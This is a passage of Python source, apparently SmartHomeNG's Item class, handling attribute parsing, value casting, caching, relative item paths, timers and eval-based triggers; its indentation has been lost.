#############################################################
global ATTRIB_COMPAT_DEFAULT
if ATTRIB_COMPAT_DEFAULT == '':
if hasattr(smarthome, '_'+KEY_ATTRIB_COMPAT):
config_attrib = getattr(smarthome,'_'+KEY_ATTRIB_COMPAT)
if str(config_attrib) in [ATTRIB_COMPAT_V12, ATTRIB_COMPAT_LATEST]:
logger.info("Global configuration: '{}' = '{}'.".format(KEY_ATTRIB_COMPAT, str(config_attrib)))
ATTRIB_COMPAT_DEFAULT = config_attrib
else:
logger.warning("Global configuration: '{}' has invalid value '{}'.".format(KEY_ATTRIB_COMPAT, str(config_attrib)))
if ATTRIB_COMPAT_DEFAULT == '':
ATTRIB_COMPAT_DEFAULT = ATTRIB_COMPAT_DEFAULT_FALLBACK
#############################################################
# Item Attributes
#############################################################
for attr, value in config.items():
if not isinstance(value, dict):
if attr in [KEY_CYCLE, KEY_NAME, KEY_TYPE, KEY_STRUCT, KEY_VALUE, KEY_INITVALUE]:
if attr == KEY_INITVALUE:
attr = KEY_VALUE
setattr(self, '_' + attr, value)
elif attr in [KEY_EVAL]:
self._process_eval(value)
elif attr in [KEY_CACHE, KEY_ENFORCE_UPDATES, KEY_ENFORCE_CHANGE]: # cast to bool
try:
setattr(self, '_' + attr, cast_bool(value))
except:
logger.warning("Item '{0}': problem parsing '{1}'.".format(self._path, attr))
continue
elif attr in [KEY_CRONTAB]: # cast to list
if isinstance(value, str):
value = [value, ]
setattr(self, '_' + attr, value)
elif attr in [KEY_EVAL_TRIGGER] or (self._use_conditional_triggers and attr in [KEY_TRIGGER]): # cast to list
self._process_trigger_list(attr, value)
elif (attr in [KEY_CONDITION]) and self._use_conditional_triggers: # cast to list
if isinstance(value, list):
cond_list = []
for cond in value:
cond_list.append(dict(cond))
self._trigger_condition = self._build_trigger_condition_eval(cond_list)
self._trigger_condition_raw = cond_list
else:
logger.warning("Item __init__: {}: Invalid trigger_condition specified! Must be a list".format(self._path))
elif attr in [KEY_ON_CHANGE, KEY_ON_UPDATE]:
self._process_on_xx_list(attr, value)
elif attr in [KEY_LOG_CHANGE]:
if value != '':
setattr(self, '_log_change', value)
self._log_change_logger = logging.getLogger('items.'+value)
# set level to make logger appear in internal list of loggers (if not configured by logging.yaml)
if self._log_change_logger.level == 0:
self._log_change_logger.setLevel('INFO')
elif attr == KEY_AUTOTIMER:
time, value, compat = split_duration_value_string(value, ATTRIB_COMPAT_DEFAULT)
timeitem = None
valueitem = None
if time.lower().startswith('sh.') and time.endswith('()'):
timeitem = self.get_absolutepath(time[3:-2], KEY_AUTOTIMER)
time = 0
if value.lower().startswith('sh.') and value.endswith('()'):
valueitem = self.get_absolutepath(value[3:-2], KEY_AUTOTIMER)
value = ''
value = self._castvalue_to_itemtype(value, compat)
self._autotimer = [ (self._cast_duration(time), value), compat, timeitem, valueitem]
elif attr == KEY_THRESHOLD:
low, __, high = value.rpartition(':')
if not low:
low = high
self._threshold = True
self.__th_crossed = False
self.__th_low = float(low.strip())
self.__th_high = float(high.strip())
self._threshold_data[0] = self.__th_low
self._threshold_data[1] = self.__th_high
self._threshold_data[2] = self.__th_crossed
logger.debug("Item {}: set threshold => low: {} high: {}".format(self._path, self.__th_low, self.__th_high))
elif attr == '_filename':
# name of file, which defines this item
setattr(self, attr, value)
else:
# the following code is executed for plugin specific attributes:
#
# get value from attribute of other (relative addressed) item
# at the moment only parent and grandparent item are supported
if (type(value) is str) and (value.startswith('..:') or value.startswith('...:')):
fromitem = value.split(':')[0]
fromattr = value.split(':')[1]
if fromattr in ['', '.']:
fromattr = attr
if fromitem == '..':
self.conf[attr] = self._get_attr_from_parent(fromattr)
elif fromitem == '...':
self.conf[attr] = self._get_attr_from_grandparent(fromattr)
else:
self.conf[attr] = value
# logger.warning("Item rel. from (grand)parent: fromitem = {}, fromattr = {}, self.conf[attr] = {}".format(fromitem, fromattr, self.conf[attr]))
else:
self.conf[attr] = value
self.property.init_dynamic_properties()
#############################################################
# Child Items
#############################################################
for attr, value in config.items():
if isinstance(value, dict):
child_path = self._path + '.' + attr
try:
child = Item(smarthome, self, child_path, value)
except Exception as e:
logger.exception("Item {}: problem creating: {}".format(child_path, e))
else:
vars(self)[attr] = child
_items_instance.add_item(child_path, child)
self.__children.append(child)
#############################################################
# Cache
#############################################################
if self._cache:
self._cache = self._sh._cache_dir + self._path
try:
self.__last_change, self._value = cache_read(self._cache, self.shtime.tzinfo())
self.__last_update = self.__last_change
self.__prev_change = self.__last_change
self.__prev_update = self.__last_change
self.__changed_by = 'Cache:None'
self.__updated_by = 'Cache:None'
except Exception as e:
logger.warning("Item {}: problem reading cache: {}".format(self._path, e))
#############################################################
# Type
#############################################################
#__defaults = {'num': 0, 'str': '', 'bool': False, 'list': [], 'dict': {}, 'foo': None, 'scene': 0}
if self._type is None:
self._type = FOO # MSinn
if self._type not in ITEM_DEFAULTS:
logger.error("Item {}: type '{}' unknown. Please use one of: {}.".format(self._path, self._type, ', '.join(list(ITEM_DEFAULTS.keys()))))
raise AttributeError
self.cast = globals()['cast_' + self._type]
#############################################################
# Value
#############################################################
if self._value is None:
self._value = ITEM_DEFAULTS[self._type]
try:
self._value = self.cast(self._value)
except:
logger.error("Item {}: value {} does not match type {}.".format(self._path, self._value, self._type))
raise
self.__prev_value = self.__last_value
self.__last_value = self._value
#############################################################
# Cache write/init
#############################################################
if self._cache:
if not os.path.isfile(self._cache):
cache_write(self._cache, self._value)
logger.warning("Item {}: Created cache for item: {}".format(self._cache, self._cache))
#############################################################
# Plugins
#############################################################
for plugin in self.plugins.return_plugins():
#plugin.xxx = [] # Empty reference list list of items
if hasattr(plugin, PLUGIN_PARSE_ITEM):
update = plugin.parse_item(self)
if update:
try:
plugin._append_to_itemlist(self)
except:
pass
self.add_method_trigger(update)
def _split_destitem_from_value(self, value):
"""
For on_change and on_update: spit destination item from attribute value
:param value: attribute value
:return: dest_item, value
:rtype: str, str
"""
dest_item = ''
# Check if assignment operator ('=') exists
if value.find('=') != -1:
# If delimiter exists, check if equal operator exists
if value.find('==') != -1:
# equal operator exists
if value.find('=') < value.find('=='):
# assignment operator exists in front of equal operator
dest_item = value[:value.find('=')].strip()
value = value[value.find('=')+1:].strip()
else:
# if equal operator does not exist
dest_item = value[:value.find('=')]
value = value[value.find('=')+1:].strip()
return dest_item, value
def _castvalue_to_itemtype(self, value, compat):
"""
casts the value to the type of the item, if backward compatibility
to version 1.2 (ATTRIB_COMPAT_V12) is not enabled
If backward compatibility is enabled, the value is returned unchanged
:param value: value to be casted
:param compat: compatibility attribute
:return: return casted value
"""
# casting of value, if compat = latest
if compat == ATTRIB_COMPAT_LATEST:
if self._type != None:
mycast = globals()['cast_' + self._type]
try:
value = mycast(value)
except:
logger.warning("Item {}: Unable to cast '{}' to {}".format(self._path, str(value), self._type))
if isinstance(value, list):
value = []
elif isinstance(value, dict):
value = {}
else:
value = mycast('')
else:
logger.warning("Item {}: Unable to cast '{}' to {}".format(self._path, str(value), self._type))
return value
def _cast_duration(self, time):
"""
casts a time value string (e.g. '5m') to an duration integer
used for autotimer, timer, cycle
supported formats for time parameter:
- seconds as integer (45)
- seconds as a string ('45')
- seconds as a string, trailed by 's' ('45s')
- minutes as a string, trailed by 'm' ('5m'), is converted to seconds (300)
:param time: string containing the duration
:param itempath: item path as additional information for logging
:return: number of seconds as an integer
"""
if isinstance(time, str):
try:
time = time.strip()
if time.endswith('m'):
time = int(time.strip('m')) * 60
elif time.endswith('s'):
time = int(time.strip('s'))
else:
time = int(time)
except Exception as e:
logger.warning("Item {}: _cast_duration ({}) problem: {}".format(self._path, time, e))
time = False
elif isinstance(time, int):
time = int(time)
else:
logger.warning("Item {}: _cast_duration ({}) problem: unable to convert to int".format(self._path, time))
time = False
return(time)
def _build_cycledict(self, value):
"""
builds a dict for a cycle parameter from a duration_value_string
This dict is to be passed to the scheduler to circumvent the parameter
parsing within the scheduler, which can't to casting
:param value: raw attribute string containing duration, value (and compatibility)
:return: cycle-dict for a call to scheduler.add
"""
time, value, compat = split_duration_value_string(value, ATTRIB_COMPAT_DEFAULT)
time = self._cast_duration(time)
value = self._castvalue_to_itemtype(value, compat)
cycle = {time: value}
return cycle
"""
--------------------------------------------------------------------------------------------
"""
def _build_on_xx_list(self, on_dest_list, on_eval_list):
"""
build on_xx data
"""
on_list = []
if on_dest_list is not None:
if isinstance(on_dest_list, list):
for on_dest, on_eval in zip(on_dest_list, on_eval_list):
if on_dest != '':
on_list.append(on_dest.strip() + ' = ' + on_eval)
else:
on_list.append(on_eval)
else:
if on_dest_list != '':
on_list.append(on_dest_list + ' = ' + on_eval_list)
else:
on_list.append(on_eval_list)
return on_list
def _process_eval(self, value):
if value == '':
self._eval_unexpanded = ''
self._eval = None
else:
self._eval_unexpanded = value
value = self.get_stringwithabsolutepathes(value, 'sh.', '(', KEY_EVAL)
self._eval = value
def _process_trigger_list(self, attr, value):
if isinstance(value, str):
value = [value, ]
self._trigger_unexpanded = value
expandedvalue = []
for path in value:
expandedvalue.append(self.get_absolutepath(path, attr))
self._trigger = expandedvalue
def _process_on_xx_list(self, attr, value):
if isinstance(value, str):
value = [value]
val_list = []
val_list_unexpanded = []
dest_var_list = []
dest_var_list_unexp = []
for val in value:
# separate destination item (if it exists)
dest_item, val = self._split_destitem_from_value(val)
dest_var_list_unexp.append(dest_item)
# expand relative item paths
dest_item = self.get_absolutepath(dest_item, KEY_ON_CHANGE).strip()
# val = 'sh.'+dest_item+'( '+ self.get_stringwithabsolutepathes(val, 'sh.', '(', KEY_ON_CHANGE) +' )'
val_list_unexpanded.append(val)
val = self.get_stringwithabsolutepathes(val, 'sh.', '(', KEY_ON_CHANGE)
# logger.warning("Item __init__: {}: for attr '{}', dest_item '{}', val '{}'".format(self._path, attr, dest_item, val))
val_list.append(val)
dest_var_list.append(dest_item)
setattr(self, '_' + attr + '_unexpanded', val_list_unexpanded)
setattr(self, '_' + attr, val_list)
setattr(self, '_' + attr + '_dest_var', dest_var_list)
setattr(self, '_' + attr + '_dest_var_unexp', dest_var_list_unexp)
return
def _get_last_change(self):
return self.__last_change
def _get_last_change_age(self):
delta = self.shtime.now() - self.__last_change
return delta.total_seconds()
def _get_last_change_by(self):
return self.__changed_by
def _get_last_update(self):
return self.__last_update
def _get_last_update_by(self):
return self.__updated_by
def _get_last_update_age(self):
delta = self.shtime.now() - self.__last_update
return delta.total_seconds()
def _get_last_value(self):
return self.__last_value
def _get_prev_change(self):
return self.__prev_change
def _get_prev_change_age(self):
delta = self.__last_change - self.__prev_change
if delta.total_seconds() < 0.0001:
return 0.0
return delta.total_seconds()
def _get_prev_change_by(self):
return 'N/A'
def _get_prev_update(self):
return self.__prev_change
def _get_prev_update_age(self):
delta = self.__last_update - self.__prev_update
if delta.total_seconds() < 0.0001:
return 0.0
return delta.total_seconds()
def _get_prev_update_by(self):
return 'N/A'
def _get_prev_value(self):
return self.__prev_value
"""
Following are methods to get attributes of the item
"""
def path(self):
"""
Path of the item
Available only in SmartHomeNG v1.6, not in versions above
:return: String with the path of the item
:rtype: str
"""
return self.property.path
def id(self):
"""
Old method name - Use item.path() instead of item.id()
"""
return self.property.path
def type(self):
"""
Datatype of the item
:return: Datatype of the item
:rtype: str
"""
return self.property.type
def last_change(self):
"""
Timestamp of last change of item's value
:return: Timestamp of last change
"""
return self.property.last_change
def age(self):
"""
Age of the item's actual value. Returns the time in seconds since the last change of the value
:return: Age of the value
:rtype: int
"""
return self.property.last_change_age
def last_update(self):
"""
Timestamp of last update of item's value (not necessarily change)
:return: Timestamp of last update
"""
return self.property.last_update
def update_age(self):
"""
Update-age of the item's actual value. Returns the time in seconds since the value has been updated (not necessarily changed)
:return: Update-age of the value
:rtype: int
"""
return self.property.last_update_age
def prev_change(self):
"""
Timestamp of the previous (next-to-last) change of item's value
:return: Timestamp of previous change
"""
return self.property.prev_change
def prev_age(self):
"""
Age of the item's previous value. Returns the time in seconds the item had the the previous value
:return: Age of the previous value
:rtype: int
"""
return self.property.prev_change_age
def prev_update(self):
"""
Timestamp of previous (next-to-last) update of item's value (not necessarily change)
:return: Timestamp of previous update
"""
return self.property.prev_update
def prev_update_age(self):
"""
Update-age of the item's previous value. Returns the time in seconds the previous value existed
since it had been updated (not necessarily changed)
:return: Update-age of the previous value
:rtype: int
"""
return self.property.prev_update_age
def prev_value(self):
"""
Next-to-last value of the item
:return: Next-to-last value of the item
"""
return self.property.last_value
def changed_by(self):
"""
Returns an indication, which plugin, logic or event changed the item's value
:return: Changer of item's value
:rtype: str
"""
return self.property.last_change_by
def updated_by(self):
"""
Returns an indication, which plugin, logic or event updated (not necessarily changed) the item's value
:return: Updater of item's value
:rtype: str
"""
return self.property.last_update_by
"""
Following are methods to handle relative item paths
"""
def get_absolutepath(self, relativepath, attribute=''):
"""
Builds an absolute item path relative to the current item
:param relativepath: string with the relative item path
:param attribute: string with the name of the item's attribute, which contains the relative path (for log entries)
:return: string with the absolute item path
"""
if not isinstance(relativepath, str):
return relativepath
if (len(relativepath) == 0) or ((len(relativepath) > 0) and (relativepath[0] != '.')):
return relativepath
relpath = relativepath.rstrip()
rootpath = self._path
while (len(relpath) > 0) and (relpath[0] == '.'):
relpath = relpath[1:]
if (len(relpath) > 0) and (relpath[0] == '.'):
if rootpath.rfind('.') == -1:
if rootpath == '':
relpath = ''
logger.error(
"{}.get_absolutepath(): Relative path trying to access above root level on attribute '{}'".format(
self._path, attribute))
else:
rootpath = ''
else:
rootpath = rootpath[:rootpath.rfind('.')]
if relpath != '':
if rootpath != '':
rootpath += '.' + relpath
else:
rootpath = relpath
logger.info(
"{}.get_absolutepath('{}'): Result = '{}' (for attribute '{}')".format(self._path, relativepath, rootpath,
attribute))
if rootpath[-5:] == '.self':
rootpath = rootpath.replace('.self', '')
rootpath = rootpath.replace('.self.', '.')
return rootpath
def expand_relativepathes(self, attr, begintag, endtag):
"""
converts a configuration attribute containing relative item paths
to absolute paths
The item's attribute can be of type str or list (of strings)
The begintag and the endtag remain in the result string!
:param attr: Name of the attribute. Use * as a wildcard at the end
:param begintag: string or list of strings that signals the beginning of a relative path is following
:param endtag: string or list of strings that signals the end of a relative path
"""
def __checkforentry(attr):
if isinstance(self.conf[attr], str):
if (begintag != '') and (endtag != ''):
self.conf[attr] = self.get_stringwithabsolutepathes(self.conf[attr], begintag, endtag, attr)
elif (begintag == '') and (endtag == ''):
self.conf[attr] = self.get_absolutepath(self.conf[attr], attr)
elif isinstance(self.conf[attr], list):
logger.debug("expand_relativepathes(1): to expand={}".format(self.conf[attr]))
new_attr = []
for a in self.conf[attr]:
# Convert accidentally wrong dict entries to string
if isinstance(a, dict):
a = list("{!s}:{!s}".format(k,v) for (k,v) in a.items())[0]
logger.debug("expand_relativepathes: before : to expand={}".format(a))
if (begintag != '') and (endtag != ''):
a = self.get_stringwithabsolutepathes(a, begintag, endtag, attr)
elif (begintag == '') and (endtag == ''):
a = self.get_absolutepath(a, attr)
logger.debug("expand_relativepathes: after: to expand={}".format(a))
new_attr.append(a)
self.conf[attr] = new_attr
logger.debug("expand_relativepathes(2): expanded={}".format(self.conf[attr]))
else:
logger.warning("expand_relativepathes: attr={} can not expand for type(self.conf[attr])={}".format(attr, type(self.conf[attr])))
# Check if wildcard is used
if isinstance(attr, str) and attr[-1:] == "*":
for entry in self.conf:
if attr[:-1] in entry:
__checkforentry(entry)
elif attr in self.conf:
__checkforentry(attr)
return
def get_stringwithabsolutepathes(self, evalstr, begintag, endtag, attribute=''):
"""
converts a string containing relative item paths
to a string with absolute item paths
The begintag and the endtag remain in the result string!
:param evalstr: string with the statement that may contain relative item paths
:param begintag: string that signals the beginning of a relative path is following
:param endtag: string that signals the end of a relative path
:param attribute: string with the name of the item's attribute, which contains the relative path
:return: string with the statement containing absolute item paths
"""
def __checkfortags(evalstr, begintag, endtag):
pref = ''
rest = evalstr
while (rest.find(begintag+'.') != -1):
pref += rest[:rest.find(begintag+'.')+len(begintag)]
rest = rest[rest.find(begintag+'.')+len(begintag):]
if endtag == '':
rel = rest
rest = ''
else:
rel = rest[:rest.find(endtag)]
rest = rest[rest.find(endtag):]
pref += self.get_absolutepath(rel, attribute)
pref += rest
logger.debug("{}.get_stringwithabsolutepathes('{}') with begintag = '{}', endtag = '{}': result = '{}'".format(
self._path, evalstr, begintag, endtag, pref))
return pref
if not isinstance(evalstr, str):
return evalstr
if isinstance(begintag, list):
# Fill end or begintag with empty tags if list length is not equal
diff_len = len(begintag) - len(endtag)
begintag = begintag + [''] * abs(diff_len) if diff_len < 0 else begintag
endtag = endtag + [''] * diff_len if diff_len > 0 else endtag
for i, _ in enumerate(begintag):
if not evalstr.find(begintag[i]+'.') == -1:
evalstr = __checkfortags(evalstr, begintag[i], endtag[i])
pref = evalstr
else:
if evalstr.find(begintag+'.') == -1:
return evalstr
pref = __checkfortags(evalstr, begintag, endtag)
return pref
def _get_attr_from_parent(self, attr):
"""
Get value from parent
:param attr: Get the value from this attribute of the parent item
:return: value from attribute of parent item
"""
pitem = self.return_parent()
pattr_value = pitem.conf.get(attr, '')
# logger.warning("_get_attr_from_parent Item {}: for attr '{}'".format(self._path, attr))
# logger.warning("_get_attr_from_parent Item {}: for parent '{}', pattr_value '{}'".format(self._path, pitem._path, pattr_value))
return pattr_value
def _get_attr_from_grandparent(self, attr):
"""
Get value from grandparent
:param attr: Get the value from this attribute of the grandparent item
:return: value from attribute of grandparent item
"""
pitem = self.return_parent()
gpitem = pitem.return_parent()
gpattr_value = pitem.get(attr, '')
# logger.warning("_get_attr_from_grandparent Item {}: for attr '{}'".format(self._path, attr))
# logger.warning("_get_attr_from_grandparent Item {}: for grandparent '{}', gpattr_value '{}'".format(self._path, gpitem._path, gpattr_value))
return gpattr_value
def _build_trigger_condition_eval(self, trigger_condition):
"""
Build conditional eval expression from trigger_condition attribute
:param trigger_condition: list of condition dicts
:return:
"""
wrk_eval = []
for or_cond in trigger_condition:
for ckey in or_cond:
if ckey.lower() == 'value':
pass
else:
and_cond = []
for cond in or_cond[ckey]:
wrk = cond
if (wrk.find('=') != -1) and (wrk.find('==') == -1) and \
(wrk.find('<=') == -1) and (wrk.find('>=') == -1) and \
(wrk.find('=<') == -1) and (wrk.find('=>') == -1):
wrk = wrk.replace('=', '==')
p = wrk.lower().find('true')
if p != -1:
wrk = wrk[:p]+'True'+wrk[p+4:]
p = wrk.lower().find('false')
if p != -1:
wrk = wrk[:p]+'False'+wrk[p+5:]
# expand relative item paths
wrk = self.get_stringwithabsolutepathes(wrk, 'sh.', '(', KEY_CONDITION)
and_cond.append(wrk)
wrk = ') and ('.join(and_cond)
if len(or_cond[ckey]) > 1:
wrk = '(' + wrk + ')'
wrk_eval.append(wrk)
# wrk_eval.append(str(or_cond[ckey]))
result = ') or ('.join(wrk_eval)
if len(trigger_condition) > 1:
result = '(' + result + ')'
return result
def __call__(self, value=None, caller='Logic', source=None, dest=None):
if value is None or self._type is None:
return copy.deepcopy(self._value)
if self._eval:
args = {'value': value, 'caller': caller, 'source': source, 'dest': dest}
self._sh.trigger(name=self._path + '-eval', obj=self.__run_eval, value=args, by=caller, source=source, dest=dest)
else:
self.__update(value, caller, source, dest)
def __iter__(self):
for child in self.__children:
yield child
def __setitem__(self, item, value):
vars(self)[item] = value
def __getitem__(self, item):
return vars(self)[item]
def __bool__(self):
return bool(self._value)
def __str__(self):
return self._name
def __repr__(self):
return "Item: {}".format(self._path)
def _init_prerun(self):
"""
Build eval expressions from special functions and triggers before first run
Called from Items.load_itemdefinitions
"""
if self._trigger:
# Only if item has an eval_trigger
_items = []
for trigger in self._trigger:
if _items_instance.match_items(trigger) == [] and self._eval:
logger.warning("item '{}': trigger item '{}' not found for function '{}'".format(self._path, trigger, self._eval))
_items.extend(_items_instance.match_items(trigger))
for item in _items:
if item != self: # prevent loop
item._items_to_trigger.append(self)
if self._eval:
# Build eval statement from trigger items (joined by given function)
items = ['sh.' + str(x.id()) + '()' for x in _items]
if self._eval == 'and':
self._eval = ' and '.join(items)
elif self._eval == 'or':
self._eval = ' or '.join(items)
elif self._eval == 'sum':
self._eval = ' + '.join(items)
elif self._eval == 'avg':
self._eval = '({0})/{1}'.format(' + '.join(items), len(items))
elif self._eval == 'max':
self._eval = 'max({0})'.format(','.join(items))
elif self._eval == 'min':
self._eval = 'min({0})'.format(','.join(items))
def _init_start_scheduler(self):
"""
Start schedulers of the items which have a crontab or a cycle attribute
up to version 1.5 of SmartHomeNG the schedulers were started when initializing the item. That
could lead to a scheduler to fire a routine, which references an item which is not yet initialized
:return:
"""
#############################################################
# Crontab/Cycle
#############################################################
if self._crontab is not None or self._cycle is not None:
cycle = self._cycle
if cycle is not None:
cycle = self._build_cycledict(cycle)
self._sh.scheduler.add(self._itemname_prefix+self._path, self, cron=self._crontab, cycle=cycle)
return
def _init_run(self):
"""
Run initial eval to set an initial value for the item
Called from Items.load_itemdefinitions
"""
if self._trigger:
# Only if item has an eval_trigger
if self._eval:
# Only if item has an eval expression
self._sh.trigger(name=self._path, obj=self.__run_eval, by='Init', value={'value': self._value, 'caller': 'Init'})
def __run_eval(self, value=None, caller='Eval', source=None, dest=None):
"""
evaluate the 'eval' entry of the actual item
"""
if self._eval:
# Test if a conditional trigger is defined
if self._trigger_condition is not None:
# logger.warning("Item {}: Evaluating trigger condition {}".format(self._path, self._trigger_condition))
try:
sh = self._sh
cond = eval(self._trigger_condition)
logger.warning("Item {}: Condition result '{}' evaluating trigger condition {}".format(self._path, cond, self._trigger_condition))
except Exception as e:
logger.warning("Item {}: problem evaluating trigger condition {}: {}".format(self._path, self._trigger_condition, e))
return
else:
cond = True
if cond == True:
# if self._path == 'wohnung.flur.szenen_helper':
# logger.info("__run_eval: item = {}, value = {}, self._eval = {}".format(self._path, value, self._eval))
sh = self._sh # noqa
shtime = self.shtime
import math as mymath
try:
value = eval(self._eval)
except Exception as e:
logger.warning("Item {}: problem evaluating {}: {}".format(self._path, self._eval, e))
else:
if value is None:
logger.debug("Item {}: evaluating {} returns None".format(self._path, self._eval))
else:
if self._path == 'wohnung.flur.szenen_helper':
logger.info("__run_eval: item = {}, value = {}".format(self._path, value))
self.__update(value, caller, source, dest)
# New for on_update / on_change
def _run_on_xxx(self, path, value, on_dest, on_eval, attr='?'):
"""
common method for __run_on_update and __run_on_change
:param path: path to this item
:param attr: Descriptive text for origin of update of item
:type: path: str
:type attr: str
"""
if self._path == 'wohnung.flur.szenen_helper':
logger.info("_run_on_xxx: item = {}, value = {}".format(self._path, value))
sh = self._sh
logger.info("Item {}: '{}' evaluating {} = {}".format(self._path, attr, on_dest, on_eval))
try:
dest_value = eval(on_eval) # calculate to test if expression computes and see if it computes to None
except Exception as e:
logger.warning("Item {}: '{}' item-value='{}' problem evaluating {}: {}".format(self._path, attr, value, on_eval, e))
else:
if dest_value is not None:
# expression computes and does not result in None
if on_dest != '':
dest_item = _items_instance.return_item(on_dest)
if dest_item is not None:
dest_item.__update(dest_value, caller=attr, source=self._path)
logger.debug(" - : '{}' finally evaluating {} = {}, result={}".format(attr, on_dest, on_eval, dest_value))
else:
logger.error("Item {}: '{}' has not found dest_item '{}' = {}, result={}".format(self._path, attr, on_dest, on_eval, dest_value))
else:
dummy = eval(on_eval)
logger.debug(" - : '{}' finally evaluating {}, result={}".format(attr, on_eval, dest_value))
else:
logger.debug(" - : '{}' {} not set (cause: eval=None)".format(attr, on_dest))
pass
def __run_on_update(self, value=None):
"""
evaluate all 'on_update' entries of the actual item
"""
if self._on_update:
sh = self._sh # noqa
# logger.info("Item {}: 'on_update' evaluating {} = {}".format(self._path, self._on_update_dest_var, self._on_update))
for on_update_dest, on_update_eval in zip(self._on_update_dest_var, self._on_update):
self._run_on_xxx(self._path, value, on_update_dest, on_update_eval, 'on_update')
def __run_on_change(self, value=None):
"""
evaluate all 'on_change' entries of the actual item
"""
if self._on_change:
sh = self._sh # noqa
# logger.info("Item {}: 'on_change' evaluating lists {} = {}".format(self._path, self._on_change_dest_var, self._on_change))
for on_change_dest, on_change_eval in zip(self._on_change_dest_var, self._on_change):
self._run_on_xxx(self._path, value, on_change_dest, on_change_eval, 'on_change')
def __trigger_logics(self, source_details=None):
source={'item': self._path, 'details': source_details}
for logic in self.__logics_to_trigger:
# logic.trigger(by='Item', source=self._path, value=self._value)
logic.trigger(by='Item', source=source, value=self._value)
# logic.trigger(by='Logic', source=None, value=None, dest=None, dt=None):
def __update(self, value, caller='Logic', source=None, dest=None):
try:
value = self.cast(value)
except:
try:
logger.warning('Item {}: value "{}" does not match type {}. Via {} {}'.format(self._path, value, self._type, caller, source))
except:
pass
return
self._lock.acquire()
_changed = False
self.__prev_update = self.__last_update
self.__last_update = self.shtime.now()
self.__updated_by = "{0}:{1}".format(caller, source)
trigger_source_details = self.__updated_by
if value != self._value or self._enforce_change:
_changed = True
self.__prev_value = self.__last_value
self.__last_value = self._value
self._value = value
self.__prev_change = self.__last_change
self.__last_change = self.__last_update
self.__changed_by = "{0}:{1}".format(caller, source)
trigger_source_details = self.__changed_by
if caller != "fader":
self._fading = False
self._lock.notify_all()
self._change_logger("Item {} = {} via {} {} {}".format(self._path, value, caller, source, dest))
if self._log_change_logger is not None:
log_src = ''
if source is not None:
log_src += ' (' + source + ')'
log_dst = ''
if dest is not None:
log_dst += ', dest: ' + dest
self._log_change_logger.info("Item Change: {} = {} - caller: {}{}{}".format(self._path, value, caller, log_src, log_dst))
self._lock.release()
# ms: call run_on_update() from here
self.__run_on_update(value)
if _changed or self._enforce_updates or self._type == 'scene':
# ms: call run_on_change() from here
self.__run_on_change(value)
for method in self.__methods_to_trigger:
try:
method(self, caller, source, dest)
except Exception as e:
logger.exception("Item {}: problem running {}: {}".format(self._path, method, e))
if self._threshold and self.__logics_to_trigger:
if self.__th_crossed and self._value <= self.__th_low: # cross lower bound
self.__th_crossed = False
self._threshold_data[2] = self.__th_crossed
self.__trigger_logics(trigger_source_details)
elif not self.__th_crossed and self._value >= self.__th_high: # cross upper bound
self.__th_crossed = True
self._threshold_data[2] = self.__th_crossed
self.__trigger_logics(trigger_source_details)
elif self.__logics_to_trigger:
self.__trigger_logics(trigger_source_details)
for item in self._items_to_trigger:
args = {'value': value, 'source': self._path}
self._sh.trigger(name=item.id(), obj=item.__run_eval, value=args, by=caller, source=source, dest=dest)
if _changed and self._cache and not self._fading:
try:
cache_write(self._cache, self._value)
except Exception as e:
logger.warning("Item: {}: could update cache {}".format(self._path, e))
if self._autotimer and caller != 'Autotimer' and not self._fading:
_time, _value = self._autotimer[0]
compat = self._autotimer[1]
if self._autotimer[2]:
try:
_time = eval('self._sh.'+self._autotimer[2]+'()')
except:
logger.warning("Item '{}': Attribute 'autotimer': Item '{}' does not exist".format(self._path, self._autotimer[2]))
if self._autotimer[3]:
try:
_value = self._castvalue_to_itemtype(eval('self._sh.'+self._autotimer[3]+'()'), compat)
except:
logger.warning("Item '{}': Attribute 'autotimer': Item '{}' does not exist".format(self._path, self._autotimer[3]))
self._autotimer[0] = (_time, _value) # for display of active/last timer configuration in backend
next = self.shtime.now() + datetime.timedelta(seconds=_time)
self._sh.scheduler.add(self._itemname_prefix+self.id() + '-Timer', self.__call__, value={'value': _value, 'caller': 'Autotimer'}, next=next)
def add_logic_trigger(self, logic):
"""
Add a logic trigger to the item
:param logic:
:type logic:
:return:
"""
self.__logics_to_trigger.append(logic)
def remove_logic_trigger(self, logic):
self.__logics_to_trigger.remove(logic)
def get_logic_triggers(self):
"""
Returns a list of logics to trigger, if the item gets changed
:return: Logics to trigger
:rtype: list
"""
return self.__logics_to_trigger
def add_method_trigger(self, method):
self.__methods_to_trigger.append(method)
def remove_method_trigger(self, method):
self.__methods_to_trigger.remove(method)
def get_method_triggers(self):
"""
Returns a list of item methods to trigger, if this item gets changed
:return: methods to trigger
:rtype: list
"""
return self.__methods_to_trigger
def autotimer(self, time=None, value=None, compat=ATTRIB_COMPAT_V12):
if time is not None and value is not None:
self._autotimer = [(time, value), compat, None, None]
else:
self._autotimer = False
def fade(self, dest, step=1, delta=1):
dest = float(dest)
self._sh.trigger(self._path, fadejob, value={'item': self, 'dest': dest, 'step': step, 'delta': delta})
def remove_timer(self):
self._sh.scheduler.remove(self._itemname_prefix+self.id() + '-Timer')
def return_children(self):
for child in self.__children:
yield child
def return_parent(self):
return self.__parent
def set(self, value, caller='Logic', source=None, dest=None, prev_change=None, last_change=None):
try:
value = self.cast(value)
except:
try:
logger.warning("Item {}: value {} does not match type {}. Via {} {}".format(self._path, value, self._type, caller, source))
except:
pass
return
self._lock.acquire()
self._value = value
if prev_change is None:
self.__prev_change = self.__last_change
else:
self.__prev_change = prev_change
if last_change is None:
self.__last_change = self.shtime.now()
else:
self.__last_change = last_change
self.__changed_by = "{0}:{1}".format(caller, None)
self.__updated_by = "{0}:{1}".format(caller, None)
self._lock.release()
self._change_logger("Item {} = {} via {} {} {}".format(self._path, value, caller, source, dest))
def timer(self, time, value, auto=False, compat=ATTRIB_COMPAT_DEFAULT):
time = self._cast_duration(time)
value = self._castvalue_to_itemtype(value, compat)
if auto:
caller = 'Autotimer'
self._autotimer = [(time, value), compat, None, None]
else:
caller = 'Timer'
next = self.shtime.now() + datetime.timedelta(seconds=time)
self._sh.scheduler.add(self._itemname_prefix+self.id() + '-Timer', self.__call__, value={'value': value, 'caller': caller}, next=next)
def get_children_path(self):
return [item._path
for item in self.__children]
def jsonvars(self):
"""
Translation method from object members to json
:return: Key / Value pairs from object members
"""
return { "id": self._path,
"name": self._name,
"value" : self._value,
"type": self._type,
"attributes": self.conf,
"children": self.get_children_path() }
# alternative method to get all class members
# @staticmethod
# def get_members(instance):
# return {k: v
# for k, v in vars(instance).items()
# if str(k) in ["_value", "conf"] }
# #if not str(k).startswith('_')}
def to_json(self):
